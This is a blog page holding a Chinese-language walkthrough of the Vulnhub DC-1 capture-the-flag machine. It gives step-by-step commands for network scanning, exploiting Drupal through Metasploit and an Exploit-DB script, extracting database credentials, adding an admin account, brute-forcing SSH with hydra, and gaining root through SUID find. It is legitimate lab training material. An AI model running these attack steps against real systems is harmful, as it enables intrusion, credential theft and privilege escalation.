



<!DOCTYPE html>
<html lang="zh-HK">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="" href="http://meviv.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="" href="http://meviv.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="" href="http://meviv.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="渗透" />


<link rel="canonical" href="http://meviv.github.io/2022/03/06/%E6%B8%97%E9%80%8F/DC-1/">



  <title>
Vulnhub DC1 - 渗透 |
Meviv Home =  = 春風吹破英雄夢，歲月磨平少年心</title>
<meta name="generator" content="Hexo 6.2.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">Vulnhub DC1
  </h1>
  
<div class="meta">
  <span class="item" title="創建時間：2022-03-06 19:41:29">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">發表於</span>
    <time itemprop="dateCreated datePublished" datetime="2022-03-06T19:41:29+08:00">2022-03-06</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切換導航欄">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Meviv Home</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="https://tva1.sinaimg.cn/large/007dFS7lly8h7r37jfz4qj31hc0u010w.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首頁</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/%E6%B8%97%E9%80%8F/" itemprop="item" rel="index" title="分類於 渗透"><span itemprop="name">渗透</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-HK">
  <link itemprop="mainEntityOfPage" href="http://meviv.github.io/2022/03/06/%E6%B8%97%E9%80%8F/DC-1/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/images/avatar.jpg">
    <meta itemprop="name" content="Meviv">
    <meta itemprop="description" content="春風吹破英雄夢，歲月磨平少年心, 夜深忽夢少年事">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>DC-1</p>
<span id="more"></span>
<h1 id="靶机下载"><a class="markdownIt-Anchor" href="#靶机下载">#</a> 靶机下载</h1>
<p>下载地址为 https://download.vulnhub.com/dc/DC-1.zip<br>
 可在 https://download.vulnhub.com 查看相关下载<br>
攻击机为 kali2022<br>
 两机均用 nat 连接</p>
<h1 id="渗透过程"><a class="markdownIt-Anchor" href="#渗透过程">#</a> 渗透过程</h1>
<h2 id="flag1"><a class="markdownIt-Anchor" href="#flag1">#</a> flag1</h2>
<p>打开 kali 扫描靶机</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>arp-scan -l</pre></td></tr></table></figure><p><img data-src="https://tva4.sinaimg.cn/large/007dFS7lly8h7r6tgjanfj30kb054dh3.jpg" alt=""><br>
也可以使用 nmap 扫描 (此处请根据实际修改 IP)</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>ifconfig</pre></td></tr><tr><td data-num="2"></td><td><pre>nmap -sP 192.168.232.0&#x2F;24</pre></td></tr></table></figure><p><img data-src="https://tva1.sinaimg.cn/large/007dFS7lly8h7r6tnpodaj30hz0hrwi3.jpg" alt=""><br>
发现目标主机后扫描开放端口</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>nmap -sV -A 192.168.232.133</pre></td></tr></table></figure><p><img data-src="https://tva2.sinaimg.cn/large/007dFS7lly8h7r6tq4q65j30n00leq8f.jpg" alt=""><br>
发现开启了 80 端口，访问 ip 查看页面信息<br>
<img data-src="https://tva4.sinaimg.cn/large/007dFS7lly8h7r6urp8tyj313q0fqq54.jpg" alt=""><br>
通过 Wappalyzer 发现网站 CMS 为 Drupal<br>
 使用 msf 进行渗透</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>msfconsole</pre></td></tr><tr><td data-num="2"></td><td><pre>search Drupal</pre></td></tr></table></figure><p><img data-src="https://tva2.sinaimg.cn/large/007dFS7lly8h7r6vde7ujj30v108atbb.jpg" alt=""><br>
用较新的漏洞进行尝试</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>use exploit&#x2F;unix&#x2F;webapp&#x2F;drupal_druopalgeddon2</pre></td></tr><tr><td data-num="2"></td><td><pre>show options</pre></td></tr><tr><td data-num="3"></td><td><pre>set RHOSTS 192.168.232.131</pre></td></tr><tr><td data-num="4"></td><td><pre>run</pre></td></tr></table></figure><p><img data-src="https://tva3.sinaimg.cn/large/007dFS7lly8h7r70q4gx2j30v80gadiu.jpg" alt=""><br>
成功得到 shell，使用 py 得到交互 shell</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>shell</pre></td></tr><tr><td data-num="2"></td><td><pre>python -c &#39;import pty; pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39;</pre></td></tr></table></figure><p>查看文件目录发现第一个 flag 执行 cat 命令查看内容<br>
<img data-src="https://tva2.sinaimg.cn/large/007dFS7lly8h7r6vtw46ij30gp06cdh3.jpg" alt=""></p>
<h2 id="flag2"><a class="markdownIt-Anchor" href="#flag2">#</a> flag2</h2>
<p>该 flag 提示查找 Drupal 框架配置文件</p>
<div class="note info">
<p>Drupal 默认数据库配置连接–&gt;/sites/default/settings.php</p>
</div>
<p>直接 cd 到该目录下查看</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>cd &#x2F;var&#x2F;www&#x2F;sites&#x2F;default</pre></td></tr><tr><td data-num="2"></td><td><pre>ls</pre></td></tr><tr><td data-num="3"></td><td><pre>cat settings.php</pre></td></tr></table></figure><p><img data-src="https://tva2.sinaimg.cn/large/007dFS7lly8h7r6w11qo6j30cp0ay752.jpg" alt=""></p>
<h2 id="flag3"><a class="markdownIt-Anchor" href="#flag3">#</a> flag3</h2>
<p>在 flag2 里发现了数据库用户和密码，连接一手</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>mysql -udbuser -pR0ck3t</pre></td></tr></table></figure><p>select * from users 查询得 admin 账户<br>
<img data-src="https://tva4.sinaimg.cn/large/007dFS7lly8h7r6wbj2g6j30kv07vq43.jpg" alt=""><br>
由于得到的密码是密文，无法直接登录，这里有两种方法解决<br>
方法一：更改账户密码<br>
使用 Drupal 对数据库的加密方法，加密脚本位置在网站根目录下的 scripts 下<br>
回到 /var/www 路径下，运行这个 password-hash.sh 加密脚本，得到新密码</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>cd &#x2F;var&#x2F;www</pre></td></tr><tr><td data-num="2"></td><td><pre>php scripts&#x2F;password-hash.sh 114514</pre></td></tr></table></figure><p><img data-src="https://tva3.sinaimg.cn/large/007dFS7lly8h7r6wdpvp6j30l9021aac.jpg" alt=""><br>
将密文更改密码 (此处建议恶补 sql 语句)</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>update users set pass&#x3D;&#39;$S$Db1FwryLsYBPfvEpR870QjGzJfPi64teqeVZrAZyjMh7HND&#x2F;Ca4q&#39; where uid&#x3D;1;</pre></td></tr></table></figure><p><img data-src="https://tva2.sinaimg.cn/large/007dFS7lly8h7r6wgbk4yj30mf01yaai.jpg" alt=""><br>
回到靶机 80 端口开放的页面进行登录，<br>
在 Dashboard 得到第三个 flag<br>
Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.<br>
<img data-src="https://tva1.sinaimg.cn/large/007dFS7lly8h7r6wibgldj30u10enmyq.jpg" alt=""><br>
<img data-src="https://tva3.sinaimg.cn/large/007dFS7lly8h7r6wl7u4oj30ji04idfy.jpg" alt=""><br>
 方法二：利用漏洞添加账户</p>
<div class="note info">
<p>SearchSploit 是一个用于搜索 Exploit-DB 漏洞数据的命令行工具，它可以允许你离线 Exploit 数据库，这样你就可以在本地执行离线搜索，这对于有时候不能联网的渗透工作非常的有用。</p>
</div>
<p>之前使用 Wappalyzer 知道 drupal 版本为 7.2<br>
 利用 searchsploit 进行攻击</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>searchsploit drupal</pre></td></tr><tr><td data-num="2"></td><td><pre>python &#x2F;usr&#x2F;share&#x2F;exploitdb&#x2F;exploits&#x2F;php&#x2F;webapps&#x2F;34992.py -t http:&#x2F;&#x2F;192.168.232.133 -u admin2 -p 114514</pre></td></tr></table></figure><p><img data-src="https://tva1.sinaimg.cn/large/007dFS7lly8h7rwps4awpj30q60lstbk.jpg" alt=""></p>
<div class="note info">
<p>这里使用 py2 的原因是 py2 对于 print 的使用不严<br>
如果在使用以上命令有报错可以尝试声明 python2</p>
</div>
<p>重新登录一下 mysql 查看，发现用户已经添加了<br>
<img data-src="https://tva1.sinaimg.cn/large/007dFS7lly8h7rwqh9q6vj30h206yjsm.jpg" alt=""></p>
<h2 id="flag4"><a class="markdownIt-Anchor" href="#flag4">#</a> flag4</h2>
<p>flag 的提示词是 passwd、-exec、shadow，看一下 /etc/passwd, 发现 flag4<br>
 看一下 /home/flag4 的文件，尝试 cat flag4/flag4.txt，拿到 flag4，发现提示我们将权限提升到 root<br>
<img data-src="https://tva2.sinaimg.cn/large/007dFS7lly8h7rwqlc992j30gx0c3q63.jpg" alt=""><br>
<img data-src="https://tva3.sinaimg.cn/large/007dFS7lly8h7rwt9jsdqj30ep02emxd.jpg" alt=""><br>
 根据提示把权限提升至 root, 进行 SUID 提权</p>
<div class="note info">
<p>什么是 suid？suid 全称是 Set owner User ID up on execution。这是 Linux 给可执行文件的一个属性。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者 / 组的权限。需要注意的是，只有程序的所有者是 0 号或其他 super user，同时拥有 suid 权限，才可以提权。<br>
一个典型的例子是将 SUID 权限分配给 find 命令，以便其他用户可以在系统中搜索特定的文件相关文件。尽管管理员可能不知道’find’命令包含用于执行命令的参数，但攻击者可以以 root 特权执行命令。</p>
</div>
<p>find 命令是包含用于执行命令的参数的，如果 find 以 SUID 权限运行，所有通过 find 执行的命令都会以 root 权限运行。<br>
也可以用 hydra 工具爆破密码，下载 John 密码包</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>wget clone http:&#x2F;&#x2F;www.openwall.com&#x2F;john&#x2F;j&#x2F;john-1.8.0.tar.gz</pre></td></tr><tr><td data-num="2"></td><td><pre>tar -xvf john-1.8.0.tar.gz</pre></td></tr><tr><td data-num="3"></td><td><pre>cd john-1.8.0&#x2F;src</pre></td></tr><tr><td data-num="4"></td><td><pre>make linux-x86-64</pre></td></tr></table></figure><p>使用如下命令进行暴力破解</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>hydra -l flag4 -P john-1.8.0&#x2F;run&#x2F;password.lst ssh:&#x2F;&#x2F;192.168.101.11 -f -vV -o hydraflag4.ssh</pre></td></tr></table></figure><p>如果直接进行了提权操作就不需要对 flag4 进行暴力破解了，可以直接看到 flag4 信息，但 flag4 用户无法查看 /root 目录内的文件信息<br>
建议进行提权<br>
 Flag4:<br>
Can you use this same method to find or access the flag in root?<br>
Probably. But perhaps it’s not that easy.  Or maybe it is?<br>
 你能用同样的方法来查找或访问根目录中的标志吗？<br>
可能。但也许不是那么容易。或许是这样？</p>
<h2 id="flag5"><a class="markdownIt-Anchor" href="#flag5">#</a> flag5</h2>
<p>首先找一下有 SUID 权限的文件</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>find &#x2F; -perm -4000</pre></td></tr></table></figure><p><img data-src="https://tva4.sinaimg.cn/large/007dFS7lly8h7rwqxsio0j30ev0b7403.jpg" alt=""><br>
看到 find 命令有 SUID 权限，所以这里可以利用 find 命令进行提权<br>
用 find 命令包含的 - exec 参数进行提权</p>
<figure class="highlight raw"><figcaption data-lang=""></figcaption><table><tr><td data-num="1"></td><td><pre>find &#x2F;var&#x2F;www -exec &quot;&#x2F;bin&#x2F;sh&quot; \;</pre></td></tr></table></figure><p>这个命令中的 /bin/sh 是 linux 内核和用户之间的命令解释器，由此完成提权<br>
得到最后一个 flag<br>
<img data-src="https://tva1.sinaimg.cn/large/007dFS7lly8h7rwr3veq8j30gn0aawg2.jpg" alt=""><br>
thefinalflag:<br>
Well done!!!<br>
Hopefully you’ve enjoyed this and learned some new skills.<br>
You can let me know what you thought of this little journey<br>
by contacting me via Twitter - @DCAU7<br>
 做得好！！！！！<br>
希望你喜欢这个并学到了一些新的技能。<br>
你对这次小旅行的看法。<br>
通过 Twitter 联系我 -@dcau7</p>
<p>End</p>

      <div class="tags">
          <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"><i class="ic i-tag"></i> 渗透</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新於</span>
    <time title="修改時間：2022-11-03 14:12:44" itemprop="dateModified" datetime="2022-11-03T14:12:44+08:00">2022-11-03</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 打賞</button>
  <p>請我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/images/wechatpay.png" alt="Meviv 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/images/alipay.png" alt="Meviv 支付寶">
        <p>支付寶</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>博主： </strong>Meviv <i class="ic i-at"><em>@</em></i>
  </li>
  <li class="link">
    <strong>文章連結：</strong>
    <a href="http://meviv.github.io/2022/03/06/%E6%B8%97%E9%80%8F/DC-1/" title="Vulnhub DC1">http://meviv.github.io/2022/03/06/渗透/DC-1/</a>
  </li>
  <li class="license">
    <strong>版權聲明： </strong>本網誌所有文章除特別聲明外，均採用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 許可協議。轉載請註明出處！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
    </div>
    <div class="item right">
      

  <a href="/2022/06/04/Python/ubuntu%E7%B3%BB%E7%BB%9F%E9%85%8D%E7%BD%AEpython/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;large&#x2F;007dFS7lly8h447qmecvpj31110kudjz.jpg" title="ubuntu系统配置python">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> Python</span>
  <h3>ubuntu系统配置python</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目錄">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA%E4%B8%8B%E8%BD%BD"><span class="toc-number">1.</span> <span class="toc-text"> 靶机下载</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E8%BF%87%E7%A8%8B"><span class="toc-number">2.</span> <span class="toc-text"> 渗透过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">2.1.</span> <span class="toc-text"> flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">2.2.</span> <span class="toc-text"> flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3"><span class="toc-number">2.3.</span> <span class="toc-text"> flag3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag4"><span class="toc-number">2.4.</span> <span class="toc-text"> flag4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag5"><span class="toc-number">2.5.</span> <span class="toc-text"> flag5</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2022/03/06/%E6%B8%97%E9%80%8F/DC-1/" rel="bookmark" title="Vulnhub DC1">Vulnhub DC1</a></li><li><a href="/2022/07/06/%E6%B8%97%E9%80%8F/dedecms01/" rel="bookmark" title="织梦系统渗透测试壹">织梦系统渗透测试壹</a></li><li><a href="/2022/07/08/%E6%B8%97%E9%80%8F/dedecms02/" rel="bookmark" title="织梦系统渗透测试贰">织梦系统渗透测试贰</a></li><li><a href="/2022/09/18/%E6%B8%97%E9%80%8F/cobalt/" rel="bookmark" title="CS实现宏病毒植入">CS实现宏病毒植入</a></li><li><a href="/2022/11/05/%E6%B8%97%E9%80%8F/rearch/" rel="bookmark" title="渗透复现任务A">渗透复现任务A</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="本站概覽">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="Meviv"
      data-src="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/images/avatar.jpg">
  <p class="name" itemprop="name">Meviv</p>
  <div class="description" itemprop="description">夜深忽夢少年事</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">11</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">4</span>
        <span class="name">分類</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">8</span>
        <span class="name">標籤</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL01ldml2" title="https:&#x2F;&#x2F;github.com&#x2F;Meviv"><i class="ic i-github"></i></span>
      <span class="exturl item email" data-url="bWFpbHRvOjE5NTY4MTY4OTBAcXEuY29t" title="mailto:1956816890@qq.com"><i class="ic i-envelope"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首頁</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>關於</a>
  </li>

    
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>歸檔</a>
  </li>

    
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分類</a>
  </li>

    
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>標籤</a>
  </li>

    
  <li class="item">
    <a href="/friends/" rel="section"><i class="ic i-heart"></i>friends</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2012 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Meviv @ Meviv Home</span>
  </div>
  <div class="powered-by">
    基於 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/03/06/渗透/DC-1/',
    favicon: {
      show: "（●´3｀●）復活成功",
      hide: "(´Д｀)瀏覽器崩潰啦"
    },
    search : {
      placeholder: "文章搜索",
      empty: "關於 「 ${query} 」 ，什麼也沒搜到",
      stats: "${time} ms 內找到 ${hits} 條結果"
    },
    valine: true,fancybox: true,
    copyright: '複製成功，轉載請遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 協議。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="//cdn.jsdelivr.net/gh/meviv/meviv.github.io@master/js/app.js?v=0.2.5"></script>




</body>
</html>
